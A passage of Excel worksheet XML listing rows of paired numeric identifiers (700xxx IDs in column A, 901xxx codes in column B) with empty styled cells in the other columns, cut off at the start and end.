    <row r="1434" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1434" s="5">
        <v>700050</v>
      </c>
      <c r="B1434" s="3">
        <v>901053.005</v>
      </c>
      <c r="D1434" s="5"/>
      <c r="E1434" s="3"/>
      <c r="F1434" s="1"/>
      <c r="H1434" s="1"/>
    </row>
    <row r="1435" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1435" s="5">
        <v>700050</v>
      </c>
      <c r="B1435" s="3">
        <v>901113</v>
      </c>
      <c r="D1435" s="5"/>
      <c r="E1435" s="3"/>
      <c r="F1435" s="1"/>
      <c r="H1435" s="1"/>
    </row>
    <row r="1436" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1436" s="5">
        <v>700614</v>
      </c>
      <c r="B1436" s="3">
        <v>901140</v>
      </c>
      <c r="D1436" s="5"/>
      <c r="E1436" s="3"/>
      <c r="F1436" s="1"/>
      <c r="H1436" s="1"/>
    </row>
    <row r="1437" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1437" s="5">
        <v>700614</v>
      </c>
      <c r="B1437" s="3">
        <v>901105</v>
      </c>
      <c r="D1437" s="5"/>
      <c r="E1437" s="3"/>
      <c r="F1437" s="1"/>
      <c r="H1437" s="1"/>
    </row>
    <row r="1438" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1438" s="5">
        <v>700614</v>
      </c>
      <c r="B1438" s="3">
        <v>901027.00100000005</v>
      </c>
      <c r="D1438" s="5"/>
      <c r="E1438" s="3"/>
      <c r="F1438" s="1"/>
      <c r="H1438" s="1"/>
    </row>
    <row r="1439" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1439" s="5">
        <v>700614</v>
      </c>
      <c r="B1439" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D1439" s="5"/>
      <c r="E1439" s="3"/>
      <c r="F1439" s="1"/>
      <c r="H1439" s="1"/>
    </row>
    <row r="1440" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1440" s="5">
        <v>700046</v>
      </c>
      <c r="B1440" s="3">
        <v>901071</v>
      </c>
      <c r="D1440" s="5"/>
      <c r="E1440" s="3"/>
      <c r="F1440" s="1"/>
      <c r="H1440" s="1"/>
    </row>
    <row r="1441" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1441" s="5">
        <v>700046</v>
      </c>
      <c r="B1441" s="3">
        <v>901547</v>
      </c>
      <c r="D1441" s="5"/>
      <c r="E1441" s="3"/>
      <c r="F1441" s="1"/>
      <c r="H1441" s="1"/>
    </row>
    <row r="1442" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1442" s="5">
        <v>700046</v>
      </c>
      <c r="B1442" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D1442" s="5"/>
      <c r="E1442" s="3"/>
      <c r="F1442" s="1"/>
      <c r="H1442" s="1"/>
    </row>
    <row r="1443" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1443" s="5">
        <v>700046</v>
      </c>
      <c r="B1443" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D1443" s="5"/>
      <c r="E1443" s="3"/>
      <c r="F1443" s="1"/>
      <c r="H1443" s="1"/>
    </row>
    <row r="1444" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1444" s="5">
        <v>700046</v>
      </c>
      <c r="B1444" s="3">
        <v>901036.00300000003</v>
      </c>
      <c r="D1444" s="5"/>
      <c r="E1444" s="3"/>
      <c r="F1444" s="1"/>
      <c r="H1444" s="1"/>
    </row>
    <row r="1445" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1445" s="5">
        <v>700046</v>
      </c>
      <c r="B1445" s="3">
        <v>901027</v>
      </c>
      <c r="D1445" s="5"/>
      <c r="E1445" s="3"/>
      <c r="F1445" s="1"/>
      <c r="H1445" s="1"/>
    </row>
    <row r="1446" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1446" s="5">
        <v>700046</v>
      </c>
      <c r="B1446" s="3">
        <v>901003.00100000005</v>
      </c>
      <c r="D1446" s="5"/>
      <c r="E1446" s="3"/>
      <c r="F1446" s="1"/>
      <c r="H1446" s="1"/>
    </row>
    <row r="1447" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1447" s="5">
        <v>700046</v>
      </c>
      <c r="B1447" s="3">
        <v>901003.00199999998</v>
      </c>
      <c r="D1447" s="5"/>
      <c r="E1447" s="3"/>
      <c r="F1447" s="1"/>
      <c r="H1447" s="1"/>
    </row>
    <row r="1448" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1448" s="5">
        <v>700046</v>
      </c>
      <c r="B1448" s="3">
        <v>901053.005</v>
      </c>
      <c r="D1448" s="5"/>
      <c r="E1448" s="3"/>
      <c r="F1448" s="1"/>
      <c r="H1448" s="1"/>
    </row>
    <row r="1449" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1449" s="5">
        <v>700046</v>
      </c>
      <c r="B1449" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D1449" s="5"/>
      <c r="E1449" s="3"/>
      <c r="F1449" s="1"/>
      <c r="H1449" s="1"/>
    </row>
    <row r="1450" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1450" s="5">
        <v>700046</v>
      </c>
      <c r="B1450" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D1450" s="5"/>
      <c r="E1450" s="3"/>
      <c r="F1450" s="1"/>
      <c r="H1450" s="1"/>
    </row>
    <row r="1451" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1451" s="5">
        <v>700046</v>
      </c>
      <c r="B1451" s="3">
        <v>901082</v>
      </c>
      <c r="D1451" s="5"/>
      <c r="E1451" s="3"/>
      <c r="F1451" s="1"/>
      <c r="H1451" s="1"/>
    </row>
    <row r="1452" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1452" s="5">
        <v>700046</v>
      </c>
      <c r="B1452" s="3">
        <v>901497</v>
      </c>
      <c r="D1452" s="5"/>
      <c r="E1452" s="3"/>
      <c r="F1452" s="1"/>
      <c r="H1452" s="1"/>
    </row>
    <row r="1453" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1453" s="5">
        <v>700046</v>
      </c>
      <c r="B1453" s="3">
        <v>901102.00199999998</v>
      </c>
      <c r="D1453" s="5"/>
      <c r="E1453" s="3"/>
      <c r="F1453" s="1"/>
      <c r="H1453" s="1"/>
    </row>
    <row r="1454" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1454" s="5">
        <v>700488</v>
      </c>
      <c r="B1454" s="3">
        <v>901087.00199999998</v>
      </c>
      <c r="D1454" s="5"/>
      <c r="E1454" s="3"/>
      <c r="F1454" s="1"/>
      <c r="H1454" s="1"/>
    </row>
    <row r="1455" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1455" s="5">
        <v>700488</v>
      </c>
      <c r="B1455" s="3">
        <v>901110</v>
      </c>
      <c r="D1455" s="5"/>
      <c r="E1455" s="3"/>
      <c r="F1455" s="1"/>
      <c r="H1455" s="1"/>
    </row>
    <row r="1456" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1456" s="5">
        <v>700488</v>
      </c>
      <c r="B1456" s="3">
        <v>901110.00100000005</v>
      </c>
      <c r="D1456" s="5"/>
      <c r="E1456" s="3"/>
      <c r="F1456" s="1"/>
      <c r="H1456" s="1"/>
    </row>
    <row r="1457" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1457" s="5">
        <v>700488</v>
      </c>
      <c r="B1457" s="3">
        <v>901110.00300000003</v>
      </c>
      <c r="D1457" s="5"/>
      <c r="E1457" s="3"/>
      <c r="F1457" s="1"/>
      <c r="H1457" s="1"/>
    </row>
    <row r="1458" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1458" s="5">
        <v>700488</v>
      </c>
      <c r="B1458" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D1458" s="5"/>
      <c r="E1458" s="3"/>
      <c r="F1458" s="1"/>
      <c r="H1458" s="1"/>
    </row>
    <row r="1459" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1459" s="5">
        <v>700488</v>
      </c>
      <c r="B1459" s="3">
        <v>901083</v>
      </c>
      <c r="D1459" s="5"/>
      <c r="E1459" s="3"/>
      <c r="F1459" s="1"/>
      <c r="H1459" s="1"/>
    </row>
    <row r="1460" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1460" s="5">
        <v>700488</v>
      </c>
      <c r="B1460" s="3">
        <v>901112</v>
      </c>
      <c r="D1460" s="5"/>
      <c r="E1460" s="3"/>
      <c r="F1460" s="1"/>
      <c r="H1460" s="1"/>
    </row>
    <row r="1461" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1461" s="5">
        <v>700488</v>
      </c>
      <c r="B1461" s="3">
        <v>901135</v>
      </c>
      <c r="D1461" s="5"/>
      <c r="E1461" s="3"/>
      <c r="F1461" s="1"/>
      <c r="H1461" s="1"/>
    </row>
    <row r="1462" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1462" s="5">
        <v>700488</v>
      </c>
      <c r="B1462" s="3">
        <v>901003.00199999998</v>
      </c>
      <c r="D1462" s="5"/>
      <c r="E1462" s="3"/>
      <c r="F1462" s="1"/>
      <c r="H1462" s="1"/>
    </row>
    <row r="1463" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1463" s="5">
        <v>700488</v>
      </c>
      <c r="B1463" s="3">
        <v>901003.00300000003</v>
      </c>
      <c r="D1463" s="5"/>
      <c r="E1463" s="3"/>
      <c r="F1463" s="1"/>
      <c r="H1463" s="1"/>
    </row>
    <row r="1464" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1464" s="5">
        <v>700488</v>
      </c>
      <c r="B1464" s="3">
        <v>901003.00399999996</v>
      </c>
      <c r="D1464" s="5"/>
      <c r="E1464" s="3"/>
      <c r="F1464" s="1"/>
      <c r="H1464" s="1"/>
    </row>
    <row r="1465" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1465" s="5">
        <v>700488</v>
      </c>
      <c r="B1465" s="3">
        <v>901201</v>
      </c>
      <c r="D1465" s="5"/>
      <c r="E1465" s="3"/>
      <c r="F1465" s="1"/>
      <c r="H1465" s="1"/>
    </row>
    <row r="1466" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1466" s="5">
        <v>700488</v>
      </c>
      <c r="B1466" s="3">
        <v>901069.00199999998</v>
      </c>
      <c r="D1466" s="5"/>
      <c r="E1466" s="3"/>
      <c r="F1466" s="1"/>
      <c r="H1466" s="1"/>
    </row>
    <row r="1467" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1467" s="5">
        <v>700488</v>
      </c>
      <c r="B1467" s="3">
        <v>901018</v>
      </c>
      <c r="D1467" s="5"/>
      <c r="E1467" s="3"/>
      <c r="F1467" s="1"/>
      <c r="H1467" s="1"/>
    </row>
    <row r="1468" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1468" s="5">
        <v>700488</v>
      </c>
      <c r="B1468" s="3">
        <v>901053.00199999998</v>
      </c>
      <c r="D1468" s="5"/>
      <c r="E1468" s="3"/>
      <c r="F1468" s="1"/>
      <c r="H1468" s="1"/>
    </row>
    <row r="1469" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1469" s="5">
        <v>700488</v>
      </c>
      <c r="B1469" s="3">
        <v>901082</v>
      </c>
      <c r="D1469" s="5"/>
      <c r="E1469" s="3"/>
      <c r="F1469" s="1"/>
      <c r="H1469" s="1"/>
    </row>
    <row r="1470" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1470" s="5">
        <v>700488</v>
      </c>
      <c r="B1470" s="3">
        <v>901016</v>
      </c>
      <c r="D1470" s="5"/>
      <c r="E1470" s="3"/>
      <c r="F1470" s="1"/>
      <c r="H1470" s="1"/>
    </row>
    <row r="1471" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1471" s="5">
        <v>700488</v>
      </c>
      <c r="B1471" s="3">
        <v>901049</v>
      </c>
      <c r="D1471" s="5"/>
      <c r="E1471" s="3"/>
      <c r="F1471" s="1"/>
      <c r="H1471" s="1"/>
    </row>
    <row r="1472" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1472" s="5">
        <v>700488</v>
      </c>
      <c r="B1472" s="3">
        <v>901550.00199999998</v>
      </c>
      <c r="D1472" s="5"/>
      <c r="E1472" s="3"/>
      <c r="F1472" s="1"/>
      <c r="H1472" s="1"/>
    </row>
    <row r="1473" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1473" s="5">
        <v>700488</v>
      </c>
      <c r="B1473" s="3">
        <v>901047</v>
      </c>
      <c r="D1473" s="5"/>
      <c r="E1473" s="3"/>
      <c r="F1473" s="1"/>
      <c r="H1473" s="1"/>
    </row>
    <row r="1474" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1474" s="5">
        <v>700115</v>
      </c>
      <c r="B1474" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D1474" s="5"/>
      <c r="E1474" s="3"/>
      <c r="F1474" s="1"/>
      <c r="H1474" s="1"/>
    </row>
    <row r="1475" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1475" s="5">
        <v>700115</v>
      </c>
      <c r="B1475" s="3">
        <v>901123</v>
      </c>
      <c r="D1475" s="5"/>
      <c r="E1475" s="3"/>
      <c r="F1475" s="1"/>
      <c r="H1475" s="1"/>
    </row>
    <row r="1476" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1476" s="5">
        <v>700115</v>
      </c>
      <c r="B1476" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D1476" s="5"/>
      <c r="E1476" s="3"/>
      <c r="F1476" s="1"/>
      <c r="H1476" s="1"/>
    </row>
    <row r="1477" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1477" s="5">
        <v>700115</v>
      </c>
      <c r="B1477" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D1477" s="5"/>
      <c r="E1477" s="3"/>
      <c r="F1477" s="1"/>
      <c r="H1477" s="1"/>
    </row>
    <row r="1478" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1478" s="5">
        <v>700115</v>
      </c>
      <c r="B1478" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D1478" s="5"/>
      <c r="E1478" s="3"/>
      <c r="F1478" s="1"/>
      <c r="H1478" s="1"/>
    </row>
    <row r="1479" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1479" s="5">
        <v>700115</v>
      </c>
      <c r="B1479" s="3">
        <v>901025</v>
      </c>
      <c r="D1479" s="5"/>
      <c r="E1479" s="3"/>
      <c r="F1479" s="1"/>
      <c r="H1479" s="1"/>
    </row>
    <row r="1480" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1480" s="5">
        <v>700115</v>
      </c>
      <c r="B1480" s="3">
        <v>901140</v>
      </c>
      <c r="D1480" s="5"/>
      <c r="E1480" s="3"/>
      <c r="F1480" s="1"/>
      <c r="H1480" s="1"/>
    </row>
    <row r="1481" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1481" s="5">
        <v>700115</v>
      </c>
      <c r="B1481" s="3">
        <v>901114.00100000005</v>
      </c>
      <c r="D1481" s="5"/>
      <c r="E1481" s="3"/>
      <c r="F1481" s="1"/>
      <c r="H1481" s="1"/>
    </row>
    <row r="1482" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1482" s="5">
        <v>700115</v>
      </c>
      <c r="B1482" s="3">
        <v>901083</v>
      </c>
      <c r="D1482" s="5"/>
      <c r="E1482" s="3"/>
      <c r="F1482" s="1"/>
      <c r="H1482" s="1"/>
    </row>
    <row r="1483" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1483" s="5">
        <v>700115</v>
      </c>
      <c r="B1483" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D1483" s="5"/>
      <c r="E1483" s="3"/>
      <c r="F1483" s="1"/>
      <c r="H1483" s="1"/>
    </row>
    <row r="1484" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1484" s="5">
        <v>700115</v>
      </c>
      <c r="B1484" s="3">
        <v>901105</v>
      </c>
      <c r="D1484" s="5"/>
      <c r="E1484" s="3"/>
      <c r="F1484" s="1"/>
      <c r="H1484" s="1"/>
    </row>
    <row r="1485" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1485" s="5">
        <v>700115</v>
      </c>
      <c r="B1485" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D1485" s="5"/>
      <c r="E1485" s="3"/>
      <c r="F1485" s="1"/>
      <c r="H1485" s="1"/>
    </row>
    <row r="1486" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1486" s="5">
        <v>700115</v>
      </c>
      <c r="B1486" s="3">
        <v>901112</v>
      </c>
      <c r="D1486" s="5"/>
      <c r="E1486" s="3"/>
      <c r="F1486" s="1"/>
      <c r="H1486" s="1"/>
    </row>
    <row r="1487" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1487" s="5">
        <v>700115</v>
      </c>
      <c r="B1487" s="3">
        <v>901095</v>
      </c>
      <c r="D1487" s="5"/>
      <c r="E1487" s="3"/>
      <c r="F1487" s="1"/>
      <c r="H1487" s="1"/>
    </row>
    <row r="1488" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1488" s="5">
        <v>700115</v>
      </c>
      <c r="B1488" s="3">
        <v>901120</v>
      </c>
      <c r="D1488" s="5"/>
      <c r="E1488" s="3"/>
      <c r="F1488" s="1"/>
      <c r="H1488" s="1"/>
    </row>
    <row r="1489" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1489" s="5">
        <v>700115</v>
      </c>
      <c r="B1489" s="3">
        <v>901057</v>
      </c>
      <c r="D1489" s="5"/>
      <c r="E1489" s="3"/>
      <c r="F1489" s="1"/>
      <c r="H1489" s="1"/>
    </row>
    <row r="1490" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1490" s="5">
        <v>700115</v>
      </c>
      <c r="B1490" s="3">
        <v>901012</v>
      </c>
      <c r="D1490" s="5"/>
      <c r="E1490" s="3"/>
      <c r="F1490" s="1"/>
      <c r="H1490" s="1"/>
    </row>
    <row r="1491" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1491" s="5">
        <v>700115</v>
      </c>
      <c r="B1491" s="3">
        <v>901091</v>
      </c>
      <c r="D1491" s="5"/>
      <c r="E1491" s="3"/>
      <c r="F1491" s="1"/>
      <c r="H1491" s="1"/>
    </row>
    <row r="1492" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1492" s="5">
        <v>700115</v>
      </c>
      <c r="B1492" s="3">
        <v>901113</v>
      </c>
      <c r="D1492" s="5"/>
      <c r="E1492" s="3"/>
      <c r="F1492" s="1"/>
      <c r="H1492" s="1"/>
    </row>
    <row r="1493" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1493" s="5">
        <v>700115</v>
      </c>
      <c r="B1493" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D1493" s="5"/>
      <c r="E1493" s="3"/>
      <c r="F1493" s="1"/>
      <c r="H1493" s="1"/>
    </row>
    <row r="1494" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1494" s="5">
        <v>700115</v>
      </c>
      <c r="B1494" s="3">
        <v>901082</v>
      </c>
      <c r="D1494" s="5"/>
      <c r="E1494" s="3"/>
      <c r="F1494" s="1"/>
      <c r="H1494" s="1"/>
    </row>
    <row r="1495" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1495" s="5">
        <v>700115</v>
      </c>
      <c r="B1495" s="3">
        <v>901614</v>
      </c>
      <c r="D1495" s="5"/>
      <c r="E1495" s="3"/>
      <c r="F1495" s="1"/>
      <c r="H1495" s="1"/>
    </row>
    <row r="1496" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1496" s="5">
        <v>700115</v>
      </c>
      <c r="B1496" s="3">
        <v>901016</v>
      </c>
      <c r="D1496" s="5"/>
      <c r="E1496" s="3"/>
      <c r="F1496" s="1"/>
      <c r="H1496" s="1"/>
    </row>
    <row r="1497" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1497" s="5">
        <v>700115</v>
      </c>
      <c r="B1497" s="3">
        <v>901033</v>
      </c>
      <c r="D1497" s="5"/>
      <c r="E1497" s="3"/>
      <c r="F1497" s="1"/>
      <c r="H1497" s="1"/>
    </row>
    <row r="1498" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1498" s="5">
        <v>700115</v>
      </c>
      <c r="B1498" s="3">
        <v>901124</v>
      </c>
      <c r="D1498" s="5"/>
      <c r="E1498" s="3"/>
      <c r="F1498" s="1"/>
      <c r="H1498" s="1"/>
    </row>
    <row r="1499" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1499" s="5">
        <v>700115</v>
      </c>
      <c r="B1499" s="3">
        <v>901125</v>
      </c>
      <c r="D1499" s="5"/>
      <c r="E1499" s="3"/>
      <c r="F1499" s="1"/>
      <c r="H1499" s="1"/>
    </row>
    <row r="1500" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1500" s="5">
        <v>700115</v>
      </c>
      <c r="B1500" s="3">
        <v>901497.00300000003</v>
      </c>
      <c r="D1500" s="5"/>
      <c r="E1500" s="3"/>
      <c r="F1500" s="1"/>
      <c r="H1500" s="1"/>
    </row>
    <row r="1501" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1501" s="5">
        <v>700235</v>
      </c>
      <c r="B1501" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D1501" s="5"/>
      <c r="E1501" s="3"/>
      <c r="F1501" s="1"/>
      <c r="H1501" s="1"/>
    </row>
    <row r="1502" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1502" s="5">
        <v>700235</v>
      </c>
      <c r="B1502" s="3">
        <v>901543.00100000005</v>
      </c>
      <c r="D1502" s="5"/>
      <c r="E1502" s="3"/>
      <c r="F1502" s="1"/>
      <c r="H1502" s="1"/>
    </row>
    <row r="1503" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1503" s="5">
        <v>700235</v>
      </c>
      <c r="B1503" s="3">
        <v>901083</v>
      </c>
      <c r="D1503" s="5"/>
      <c r="E1503" s="3"/>
      <c r="F1503" s="1"/>
      <c r="H1503" s="1"/>
    </row>
    <row r="1504" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1504" s="5">
        <v>700235</v>
      </c>
      <c r="B1504" s="3">
        <v>901113</v>
      </c>
      <c r="D1504" s="5"/>
      <c r="E1504" s="3"/>
      <c r="F1504" s="1"/>
      <c r="H1504" s="1"/>
    </row>
    <row r="1505" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1505" s="5">
        <v>700538</v>
      </c>
      <c r="B1505" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D1505" s="5"/>
      <c r="E1505" s="3"/>
      <c r="F1505" s="1"/>
      <c r="H1505" s="1"/>
    </row>
    <row r="1506" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1506" s="5">
        <v>700538</v>
      </c>
      <c r="B1506" s="3">
        <v>901560.00100000005</v>
      </c>
      <c r="D1506" s="5"/>
      <c r="E1506" s="3"/>
      <c r="F1506" s="1"/>
      <c r="H1506" s="1"/>
    </row>
    <row r="1507" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1507" s="5">
        <v>700538</v>
      </c>
      <c r="B1507" s="3">
        <v>901119</v>
      </c>
      <c r="D1507" s="5"/>
      <c r="E1507" s="3"/>
      <c r="F1507" s="1"/>
      <c r="H1507" s="1"/>
    </row>
    <row r="1508" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1508" s="5">
        <v>700538</v>
      </c>
      <c r="B1508" s="3">
        <v>901020</v>
      </c>
      <c r="D1508" s="5"/>
      <c r="E1508" s="3"/>
      <c r="F1508" s="1"/>
      <c r="H1508" s="1"/>
    </row>
    <row r="1509" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1509" s="5">
        <v>700538</v>
      </c>
      <c r="B1509" s="3">
        <v>901005</v>
      </c>
      <c r="D1509" s="5"/>
      <c r="E1509" s="3"/>
      <c r="F1509" s="1"/>
      <c r="H1509" s="1"/>
    </row>
    <row r="1510" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1510" s="5">
        <v>700538</v>
      </c>
      <c r="B1510" s="3">
        <v>901025</v>
      </c>
      <c r="D1510" s="5"/>
      <c r="E1510" s="3"/>
      <c r="F1510" s="1"/>
      <c r="H1510" s="1"/>
    </row>
    <row r="1511" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1511" s="5">
        <v>700538</v>
      </c>
      <c r="B1511" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D1511" s="5"/>
      <c r="E1511" s="3"/>
      <c r="F1511" s="1"/>
      <c r="H1511" s="1"/>
    </row>
    <row r="1512" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1512" s="5">
        <v>700538</v>
      </c>
      <c r="B1512" s="3">
        <v>901041</v>
      </c>
      <c r="D1512" s="5"/>
      <c r="E1512" s="3"/>
      <c r="F1512" s="1"/>
      <c r="H1512" s="1"/>
    </row>
    <row r="1513" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1513" s="5">
        <v>700538</v>
      </c>
      <c r="B1513" s="3">
        <v>901567.00199999998</v>
      </c>
      <c r="D1513" s="5"/>
      <c r="E1513" s="3"/>
      <c r="F1513" s="1"/>
      <c r="H1513" s="1"/>
    </row>
    <row r="1514" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1514" s="5">
        <v>700538</v>
      </c>
      <c r="B1514" s="3">
        <v>901008</v>
      </c>
      <c r="D1514" s="5"/>
      <c r="E1514" s="3"/>
      <c r="F1514" s="1"/>
      <c r="H1514" s="1"/>
    </row>
    <row r="1515" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1515" s="5">
        <v>700538</v>
      </c>
      <c r="B1515" s="3">
        <v>901574.00100000005</v>
      </c>
      <c r="D1515" s="5"/>
      <c r="E1515" s="3"/>
      <c r="F1515" s="1"/>
      <c r="H1515" s="1"/>
    </row>
    <row r="1516" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1516" s="5">
        <v>700538</v>
      </c>
      <c r="B1516" s="3">
        <v>901036.00399999996</v>
      </c>
      <c r="D1516" s="5"/>
      <c r="E1516" s="3"/>
      <c r="F1516" s="1"/>
      <c r="H1516" s="1"/>
    </row>
    <row r="1517" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1517" s="5">
        <v>700538</v>
      </c>
      <c r="B1517" s="3">
        <v>901120</v>
      </c>
      <c r="D1517" s="5"/>
      <c r="E1517" s="3"/>
      <c r="F1517" s="1"/>
      <c r="H1517" s="1"/>
    </row>
    <row r="1518" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1518" s="5">
        <v>700538</v>
      </c>
      <c r="B1518" s="3">
        <v>901053.005</v>
      </c>
      <c r="D1518" s="5"/>
      <c r="E1518" s="3"/>
      <c r="F1518" s="1"/>
      <c r="H1518" s="1"/>
    </row>
    <row r="1519" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1519" s="5">
        <v>700538</v>
      </c>
      <c r="B1519" s="3">
        <v>901102.00199999998</v>
      </c>
      <c r="D1519" s="5"/>
      <c r="E1519" s="3"/>
      <c r="F1519" s="1"/>
      <c r="H1519" s="1"/>
    </row>
    <row r="1520" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1520" s="5">
        <v>700498</v>
      </c>
      <c r="B1520" s="3">
        <v>901005</v>
      </c>
      <c r="D1520" s="5"/>
      <c r="E1520" s="3"/>
      <c r="F1520" s="1"/>
      <c r="H1520" s="1"/>
    </row>
    <row r="1521" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1521" s="5">
        <v>700498</v>
      </c>
      <c r="B1521" s="3">
        <v>901573</v>
      </c>
      <c r="D1521" s="5"/>
      <c r="E1521" s="3"/>
      <c r="F1521" s="1"/>
      <c r="H1521" s="1"/>
    </row>
    <row r="1522" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1522" s="5">
        <v>700498</v>
      </c>
      <c r="B1522" s="3">
        <v>901083</v>
      </c>
      <c r="D1522" s="5"/>
      <c r="E1522" s="3"/>
      <c r="F1522" s="1"/>
      <c r="H1522" s="1"/>
    </row>
    <row r="1523" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1523" s="5">
        <v>700498</v>
      </c>
      <c r="B1523" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D1523" s="5"/>
      <c r="E1523" s="3"/>
      <c r="F1523" s="1"/>
      <c r="H1523" s="1"/>
    </row>
    <row r="1524" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1524" s="5">
        <v>700498</v>
      </c>
      <c r="B1524" s="3">
        <v>901105</v>
      </c>
      <c r="D1524" s="5"/>
      <c r="E1524" s="3"/>
      <c r="F1524" s="1"/>
      <c r="H1524" s="1"/>
    </row>
    <row r="1525" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1525" s="5">
        <v>700498</v>
      </c>
      <c r="B1525" s="3">
        <v>901095</v>
      </c>
      <c r="D1525" s="5"/>
      <c r="E1525" s="3"/>
      <c r="F1525" s="1"/>
      <c r="H1525" s="1"/>
    </row>
    <row r="1526" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1526" s="5">
        <v>700498</v>
      </c>
      <c r="B1526" s="3">
        <v>901033</v>
      </c>
      <c r="D1526" s="5"/>
      <c r="E1526" s="3"/>
      <c r="F1526" s="1"/>
      <c r="H1526" s="1"/>
    </row>
    <row r="1527" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1527" s="5">
        <v>700527</v>
      </c>
      <c r="B1527" s="3">
        <v>901548.00199999998</v>
      </c>
